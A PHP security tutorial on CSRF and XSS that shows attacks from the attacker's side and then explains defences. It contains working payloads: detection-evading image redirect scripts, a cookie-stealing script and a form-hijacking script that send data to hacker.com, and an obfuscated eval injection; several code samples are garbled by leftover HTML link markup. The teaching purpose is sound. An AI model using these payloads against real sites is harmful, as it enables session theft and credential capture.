(Author: Ilia Alshanetsky) Of all the vulnerabilities affecting web applications, especially those written in PHP, Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) are by far the most prevalent. In many instances, developers downplay the severity of these threats and fail to take preventative action.
In this article, we will show you how CSRF and XSS work and how to defend against them. To dispel the myths about these attacks, I will assume the role of a hacker and show how the supposedly harmless injection of tiny bits of HTML can perform amazing things, from stealing the user's identity to a completely transparent rewrite of site content.
To get the most from this article, you should know the basics of PHP, HTML and JavaScript.
Let's start with a brief overview of CSRF and XSS. The principle behind both vulnerabilities is that the hacker gains the ability to insert some arbitrary content into the page. This content can be used to do things that the author of the site did not intend, like stealing the hapless user's cookies.
The difference between CSRF and XSS is the way in which the attack is delivered. XSS relies on the injection of arbitrary data through non-validated input, such as fields from a POST form submission. On the other hand, CSRF depends on browser features to retrieve and execute the attack bundle.
Let's begin with a CSRF attack, simply because it takes the least amount of effort to perform and many applications are vulnerable to it. Consider an application such as a bulletin board or a blog that allows the user to embed images into their messages via the use of the <img> tag or the BBcode equivalent [img] tag. To those unfamiliar with BBcode, it is a set of formatting tags, very similar to HTML, but intended to provide a limited subset of text formatting attributes.
Rather than supplying a genuine image, the URL will actually link to some page on the site where a GET request executes an action, for example http://foobar.com/admin/delete_msg=1. When the user loads the page, the browser will try to open the image. This will inadvertently execute a command that removes the message with an ID of 1. This will not work for all users, but we only need to perform the action once. Vulnerable users are those who are logged in at foobar.com and have an authentication cookie, and thus have the necessary credentials to perform a given action.
To make matters worse, old versions of Internet Explorer and other browsers execute and render entire web pages hidden in images. If the URL points to an HTML file, the browser renders and executes that page, retrieving all of its components as well. This is particularly dangerous as the page can contain an extensive JavaScript code block, which can be used to reference and modify the content of the original page by referencing its content via window.opener.
This particular abuse was one of the earliest CSRF attacks, used by scammers trying to drive traffic to their sites by getting to the top of various link aggregators. The scammers tended to embed image widgets on their pages linking to aggregator sites, thus making each visitor effectively perform a request to the site. This in turn would significantly elevate their "ping-back" statistics, getting them to the top of the list quickly. This scam is still out there, but it relies on linking directly to a URL assigned to each site, with the purpose of linking back to the tracker. For example, foobar.com may have been assigned a URL as http://tracker.com/?sid=1234, so the site's operator can simply embed this URL on various sites (including his own), making each user loading the page visit his page. In effect, foobar.com would be sending a lot of traffic to tracker.com. Fortunately, because only one URL is loaded, in most cases a simple HTTP Referrer check will reveal the scam.
Another attack is mostly an attempt to break the site's layout. For example, the trickster could use an image that is small in file size but has large dimensions, thus ensuring it takes up the entire screen, pushing all other content off the page. For example, a GIF image with massive dimensions of 2000 by 2000 pixels can take a mere 3786 bytes and is sure to take up all of the screen space, no matter how large your monitor is. But this is not really a hack per say, more an annoyance than anything else.
Now you may be thinking: "My application is smarter: rather than allowing arbitrary image links, it uses the PHP function getimagesize() (or equivalent) to validate each image to ensure it is really an image of acceptable size and dimensions."
Alas, this safety mechanism can be easily bypassed; let's take a moment to explore how. First, the attacker will try to ensure that the basic extension checks pass, and provide a URL that really does look like a link to an image, for example http://hacker.com/me.jpg. This will ensure that validators looking for the proper image extension are not alerted. The next trick is to have me.jpg rewritten by mod_rewrite to a PHP script that will take the proper action, which gives an intruder maximum flexibility.
RewriteEngine on RewriteRule ^/me.jpg$ hacker.php
At this point, any request to me.jpg will actually go to the hacker.php script instead; inside the script we can take a number of approaches to trick the validator. For example, if one knows the IP of the server the "check" request originates from, he can send them a valid image, while redirecting the rest to the URL of his choice.
if ($_SERVER['REMOTE_ADDR'] = '1.2.3.4') { <a href="http://www.php.net/header" mce_href="http://www.php.net/header">header</a>("Content-Type: image/jpeg"); <a href="http://www.php.net/readfile" mce_href="http://www.php.net/readfile">readfile</a>("./me.jpg"); } else { <a href="http://www.php.net/header" mce_href="http://www.php.net/header">header</a>("Location: http://foobar.com/admin/delete_msg.php?=1"; }
Another approach that is more universal is to check for the presence of the HTTP_REFERER header provided by most browsers as a way to reference the page the user came from. When PHP makes a validation request via getimagesize() or the admin is manually accessing the link, this field is empty. Therefore we can base our content check on the presence of this header: if it exists, we'll try to perform the attack, and if it is not, we'll show a harmless image.
if (<a href="http://www.php.net/empty" mce_href="http://www.php.net/empty">empty</a>($_SERVER['HTTP_REFERER'])) { <a href="http://www.php.net/header" mce_href="http://www.php.net/header">header</a>("Content-Type: image/jpeg"); <a href="http://www.php.net/readfile" mce_href="http://www.php.net/readfile">readfile</a>("./me.jpg"); } else { <a href="http://www.php.net/header" mce_href="http://www.php.net/header">header</a>("Location: http://foobar.com/admin/delete_msg.php?=1"); }
In some cases our content may actually need to go through a validation process, such as a post approval on a blog or an avatar approval on a forum. If we use the previously shown tricks, an admin or moderator can spot our attack and do something about it. To avoid detection, we can time the launch of the attack by putting a 1-2 day delay inside our script or simply waiting until the content is approved before we start to execute the redirect. An additional trick can rely on random attacks, so that not every user will be affected. Also, we won't attack the same user twice, to further reduce our chances of detection.
$deployment_time = <a href="http://www.php.net/filemtime" mce_href="http://www.php.net/filemtime"filemtime</a>__FILE__); if ($deployment_time > (<a href="http://www.php.net/time" mce_href="http://www.php.net/time">time</a>() + 86400 * 2) || <a href="http://www.php.net/isset" mce_href="http://www.php.net/isset">isset</a>($_COOKIE['h']) || !(<a href="http://www.php.net/rand" mce_href="http://www.php.net/rand">rand</a>() % 3)) { <a href="http://www.php.net/header" mce_href="http://www.php.net/header">header</a>("Content-Type: image/jpeg"); <a href="http://www.php.net/readfile" mce_href="http://www.php.net/readfile">readfile</a>("./me.jpg"); } <a href="http://www.php.net/setcookie" mce_href="http://www.php.net/setcookie">setcookie</a>("h", "1", "hacker.com", <a href="http://www.php.net/time" mce_href="http://www.php.net/time">time</a>() + 86400 * 365, "/"); <a href="http://www.php.net/header" mce_href="http://www.php.net/header">header</a>("Location: http://foobar.com/admin/delete_msg.php?=1");
In the new script there are three mechanisms in place that try to thwart detection. First of all, assuming each attack is its own script, we will not attempt to cause trouble for two days after deployment. This will ensure in most cases that we will be able to bypass the initial validation process if one exists. Then, a cookie is used to keep track of the user and ensure we that we only attack the same person once. Finally, we will also randomize the attack process, showing the redirect on approximately every third request.
So what can be done about this problem? There are two solutions. The first one involves disabling the ability for a user to supply any image links. While this seems to be the safest and simplest way out, for many developers it presents an unwelcome loss of functionality. The other alternative involves downloading each image locally, validating it with the getimagesize() function, then storing the file on the server and modifying the image link to reference the local file.
<span>$img = "http://hacker.com/me.jpg"; file_put_contents<span>($img_store_dir.<a href="http://www.php.net/md5" mce_href="http://www.php.net/md5">md5</a>($img), <a href="http://www.php.net/file_get_contents" mce_href="http://www.php.net/file_get_contents">file_get_contents</a>($img)); $i = <a href="http://www.php.net/getimagesize" mce_href="http://www.php.net/getimagesize">getimagesize</a>($img_store_dir</span>.<a href="http://www.php.net/md5" mce_href="http://www.php.net/md5">md5</a>(>$img)); if (!$i && $i[0] > $max_width && $i[1] > <span>$max_height){ <a href="http://www.php.net/unlink" mce_href="http://www.php.net/unlink"><span>unlink</a>($img_store_dir</span>.<a href="http://www.php.net/md5" mce_href="http://www.php.net/md5">md5</a>($img)); } <a href="http://www.php.net/rename" mce_href="http://www.php.net/rename">rename</a>($img_store_dir.<a href="http://www.php.net/md5" mce_href="http://www.php.net/md5">md5</a>($img), $img_store_dir.<a href="http://www.php.net/md5" mce_href="http://www.php.net/md5">md5</a>($img)</span>.image_type_to_extension<span>($i[2]));
In the above example, the first action we perform is to download the image to a local file, place it inside our image store directory and assign a name based on the md5 hash of the URL. Once the file is downloaded, we proceed to validate it via the getimagesize() function. The reason for downloading to a local file first is to ensure that the potential hacker does not have a chance to modify the content between requests.
The output of the getimagesize() function is an array giving us all sorts of information about our image. If there is no returned array, we know the image is not valid. So, our validation check involves testing that we have an image, and then making sure its dimensions are within the allowed boundaries. In the event any of these checks fail, the offending file is removed. Finally, we rename the file, giving it an image extension based on its type to ensure that browsers can display the image.
There are several other issues with this approach, though. The first is that storing all images locally may be a very disk-consuming operation. Furthermore, serving all images sent by the user from the server may substantially increase the bandwidth utilization of the server, raising the hosting costs. These two problems may in part be alleviated by setting a size restriction on the image, but that does not solve the problem altogether.
Perhaps the biggest issue lies in the fact that having PHP download an external file is something that an attacker can abuse to launch a Denial of Service (DoS) attack against the server. To download a file, the first thing PHP needs to do is to establish a connection to a host server. If that server happens to be particularly slow, this can take a fair amount of time. During this time, the PHP process responsible for handling the request is waiting for a socket (a process that takes no CPU time, so maximum execution limit is not triggered). By default, this wait time lasts for a whooping 60 seconds, during which this process is unusable for operations. If every web server process can be made to perform the download, the server will become inaccessible to other users. Given that most servers allow less then 200 simultaneous connections, this is quite trivial to exploit. Fortunately, PHP provides a solution in the form of a default_socket_timeout INI setting that can be used to lower the connection timeout to a smaller, much safer value, like 2-5 seconds. This setting can be altered within the script itself and will affect all connections established by PHP via the streams API:
<a href="http://www.php.net/ini_set" mce_href="http://www.php.net/ini_set">ini_set</a>("default_socket_timeout", 5);
The above command will solve the connection problem, but it does not address the slow downloading of the image itself. This is further exacerbated by the fact that PHP will wait indefinitely for the content to arrive from the remote server; there isn't even a token limit as there is on the connection establishing process. Before you despair, there is a way to address that problem as well, by setting a read/write timeout value via the stream_set_timeout() function. However, it can only work with a stream resource, so we need to modify our image-reading code:
$fp = <a href="http://www.php.net/fopen" mce_href="http://www.php.net/fopen">fopen</a>($img_url, "r"); <a href="http://www.php.net/stream_set_timeout" mce_href="http://www.php.net/stream_set_timeout">stream_set_timeout</a>($fp, 1); file_put_contents($destination_path, stream_get_contents($fp)); <a href="http://www.php.net/fclose" mce_href="http://www.php.net/fclose">fclose</a>($fp);
With the new code, we tell PHP to spend no more than a second waiting for the data to arrive at the socket. An even smaller timeout value can be set via the third argument of the stream_set_timeout() function, which times a microsecond value, so stream_set_timeout($fp,0,250000); would indicate a quarter of a second timeout.
But even with careful timeout setup, there is still room for abuse. The attacker simply needs to send data very slowly, let's say 5 bytes per second, just enough to avoid triggering our timeout. With just a 20 kilobyte image (20480 bytes), this would occupy the server for about 68 seconds. This problem is next to impossible to solve. The solution would require reading the image in one-byte chunks, continually testing the speed. If the connection is determined to be slower than the allowed minimum, the file would be rejected. This approach causes the expenditure of far more processing resources, which trades off one problem for another.
So what is the bottom line, as far as the images go? Well, short of removing the functionality and preventing their use altogether, all other solutions merely make attacks more difficult, but certainly not impossible.
While the image tag is the most frequent method of attack, CSRF can be mounted in a number of other ways that from some perspectives are far nastier and much harder to spot. One such attack can be mounted through the background CSS attribute, which allows for the specification of an image that is to be used as a background for a page element.
How can the CSS elements be injected into the code? Well, it is simpler then you might think and is quite common. The problem originates from the fact that many PHP applications seek to provide the user with the ability to control the manner in which the information is displayed, by allowing the use of simple HTML formatting tags like bold and italics. In many cases, the tag allowance is done via the use of the optional parameter of the strip_tags() function. This parameter allows the exclusion of certain supposedly harmless tags from removal. If a developer wants to enable users of his application to use the basic formatting tags, he simply tells the function not to remove them. For example, if I wanted to allow the usage of bold and italics, I would simply call the function like this:
<a href="http://www.php.net/strip_tags" mce_href="http://www.php.net/strip_tags">strip_tags</a>($test, "<b><i>");
Seems pretty simple and safe, right?
Alas, this is not the case. When the strip_tags() function makes an allowance for a tag, it allows the tag in its entirety, including any attributes it may have. This means that while the attacker cannot inject other tags, he can pack attributes into the allowed tags. Technically, according to the W3C specification, tags such as b and i do not support styling elements governing the background of an element. Unfortunately, this hardly matters to most browsers because they support them anyway. So, to repeat the tricks we performed on the image tag, we simply need to use a style attribute as in the following example:
$text = '<b style="background: url(<span>\'http://hacker.com/me/.jpg\')">TEST</b>';
While a broken image will show up in the browser as an icon or similar indication, a missing or broken background is completely transparent and thus much more difficult to detect.
Hopefully, this example illustrates why the tag allowance feature of strip_tags()should not be used. Rather, consider implementing a small subset of BBcode, which does not support attributes. The tags are converted by the BBcode parser to the equivalent HTML, thus giving the user the capability to adjust text without opening attribute vulnerabilities. You don't have to write a parser on your own, as there are some tools that are ready to use. For example, the PEAR class HTML_BBCodeParser would serve well for the purpose. It can be downloaded from http://pear.php.net/package/HTML_BBCodeParser. An alternative to BBCode is to use the SafeHTML PHP package, available from http://pixel-apes.com/safehtml. It eliminates all unsafe HTML elements and attributes from the given text.
Aside from background tricks and the usage of the image tags, almost any tag that triggers the automatic download of a linked resource can be a point of CSRF attack. However, tags like iframe and script are generally not accessible to the user. However, if they can be modified through an unverified variable, they pose a threat that is equal to the previously explained mechanisms.
While CSRF is based on abusing the existing or allowed page elements, Cross Site Scripting (XSS) is an attempt to bypass input validation and give the attacker the means to inject content into the page. This content can be used to trick the user into disclosing sensitive information, execute actions via existing credentials, and so on. Even a CSRF attack can be mounted through the initial XSS hole, so in some ways, XSS is an exploit with nearly limitless possibilities. Unfortunately, XSS is also extremely common, arguably the biggest bane of web applications, affecting both large and small sites.
In most cases an XSS opportunity is not even very well hidden. Often it is featured on the front page of the website, in the form of a search box. When the user submits a search term, the initial query is displayed on the result page, usually as the value of the <input> tag to allow easy modification of the entry. The lack of validation is what gives the intruder the means and opportunity to execute an XSS attack. To trigger the exploit, the attacker simply needs to specify "> XSS STRING <", where the XSS STRING is some arbitrary content to be injected into the page. The initial "> is intended to terminate the <input> tag (where the query is placed), and the ending <" handles the closure of the remaining portion of the tag.
<input type="text" name="s" value="<?php echo $_POST['q']; ?>" /> // compromised output <input type="text" name="s" value=""> XSS STRING <"" />
With this content in place, the attacker can now choose to modify the content of the page in any number of ways. For example, if I wanted to acquire the user's cookie for my own nefarious purpose, I would simply replace XSS STRING with the code below.
<script> var r = new XMLHttpRequest(); r.open ('get', 'http://hacker.com/?'+document.cookie); r.send(null); </script>
This small piece of JavaScript code makes an HTTP request to a site of the hacker's choice, sending the names and content of all the cookies currently set for the victim. The intruder can now duplicate those cookies and gain the same access credentials as the compromised user. The XMLHttpRequest feature is specific to Mozilla Firefox, but fortunately for the hacker, IE has an equivalent, ActiveXObject("Microsoft.XMLHTTP"); that works in the same way. This makes this hack universal.
Another trick is particularly well suited for pages that collect information from the user through a series of forms. Examples include a login page or a financial information request form on some e-commerce site. In this case, the attack string can be used to modify the action of the forms, making them send the data to an alternate site.
<script> for (i=0; i<document.forms.length; i++) document.forms[i].action='http://hacker.com/x.php?'+ document.forms[i].action; </script>
The script above will go through all of the forms found on a given page and modify their action fields according to the intruder's wish. When a user submits information, it will never reach the intended page, going to the hacker instead. A particularly inventive attacker will take the time to not only capture the submitted information, but also to hide the evidence of the attack, by having the user's information sent to the intended destination though a temporary redirect:
log_data($_GET</span>, $_POST); <a href="http://www.php.net/header" mce_href="http://www.php.net/header">header</a>("HTTP/1.0 307 Moved Permanently"); <a href="http://www.php.net/header" mce_href="http://www.php.net/header">header</a>("Location: ".$_SERVE['QUERY_STRING']);
When redirecting a POST request, the browser should confirm the action with the user. However, the message is not particularly clear and many users will simply click through. Even if they do not, the damage has already been done. Because all the operations are done through redirects, the HTTP_REFERER header is never updated, so the site also does not have any evidence of the attack in real-time. The only evidence of this can perhaps be found inside the access logs, where the initial request with the attack string is located.
In some situations, the application developer has implemented some basic, but incomplete, safeguards. For example, it is not uncommon that the <, ? and > characters necessary for tag injection are encoded into >, " and < respectively, leaving single quotes (') untouched. This is the common result of the default htmlspecialchars() and the htmlentities() PHP functions, which encode special characters into equivalent HTML entities. The problem with leaving single quotes un-encoded is that some HTML tags actually use single quotes for attribute enclosure. This means that the attacker can prematurely terminate the existing attributes and inject some of his own.
For example, we could use the onMouseOver attribute to trigger a JavaScript event as soon as the mouse is moved over the compromised page element. Then, we must avoid all of the encoded characters and the single quote, as it is now acting as an attribute enclosure. While this may sound complex, it is actually quite trivial to perform, thanks to two JavaScript functions: String.fromCharCode() (which can be used to convert a list of ASCII codes into the characters they represent) and eval() (which will execute the given string). To implement a popup JavaScript alert exclaiming XSS, a hacker would simply inject the following string:
'onMouseOver='<a href="http://www.php.net/eval" mce_href="http://www.php.net/eval">eval</a>(String.fromCharCode (97,108,101,114,116,40,39,88,83,83,39,41,59))' '
The initial single quotation mark terminates an open attribute and the final one starts the attribute we've hacked anew, to prevent an HTML parsing error. The content in the middle is our new attribute containing the JavaScript code with ASCII codes that translate into alert('XSS'); and are promptly executed by eval().
To avoid these kinds of problems, it is important to always pass ENT_QUOTES as the second parameter to the htmlspecialchars() and htmlentities() functions. This will trigger the encoding of single quotes into the representative HTML entity.
A related validation mistake is to rely solely on the strip_tags() function for the purposes of securing user input. While the function is extremely effective at removing HTML tags, it does nothing about the single or double quotes. A proper approach would be to perform strip_tags() first, then follow it up with either htmlspecialchars() or htmlentities():
$text = <a href="http://www.php.net/htmlspecialchars" mce_href="http://www.php.net/htmlspecialchars">htmlspecialchars</a>(<a href="http://www.php.net/strip_tags" mce_href="http://www.php.net/strip_tags">strip_tags</a>($_POST['msg']), ENT_QUOTES);
It is imperative to validate all input, no matter the source. A common mistake is to filter only the data coming through GET, POST and cookies, while forgetting to validate data received from the web server environment variables from the $_SERVER super-global. While the data found within it is provided by the web server, it is often based on user-supplied content, making it just as dangerous as data coming directly from the user. These values are the ones that are often found in control panels when an error occurs, which makes them particularly dangerous; the user subjected to the modified content will then often have elevated access privileges (as administrator).
One such attack can involve the HTTP_HOST value, which holds the domain name that is currently being accessed. Many think of it as a safe value; after all, how can the attacker change the domain? The value of this header is actually based on the Host: header supplied by the user making the request. If the site being accessed is running on a dedicated IP address or is the primary (first) site on virtual IP, a request with a bogus value for this header will still work on an Apache web server. A request for a page on such a site can be forged, allowing arbitrary data to be injected into HTTP_HOST:
GET / HTTP/1.0 Host: <script>...
The result is that $_SERVER['HTTP_HOST'] now equals "<script>..." or potentially a far more dangerous payload. The same logic can be applied to other headers like Via (HTTP_VIA) and X-Forwarded-For (HTTP_X_FORWARDED_FOR), which are normally used by proxies to indicate the address of the user behind the proxy. Perhaps the only truly safe field is REMOTE_ADDR, the user's IP address. This is resolved by the web server and will always contain a valid IP. All other fields should be meticulously validated prior to usage.
Hopefully, this brief overview of XSS and CSRF was an eye-opener, showing the dangers posed by these exploits and highlighting the need for taking steps to prevent them. We have shown you how simple it is to deploy mechanisms against those attacks. Now the security of your server lies in your hands: if you apply those principles while writing your code, you will be able to diminish the risk of unauthorized access and prevent potential losses.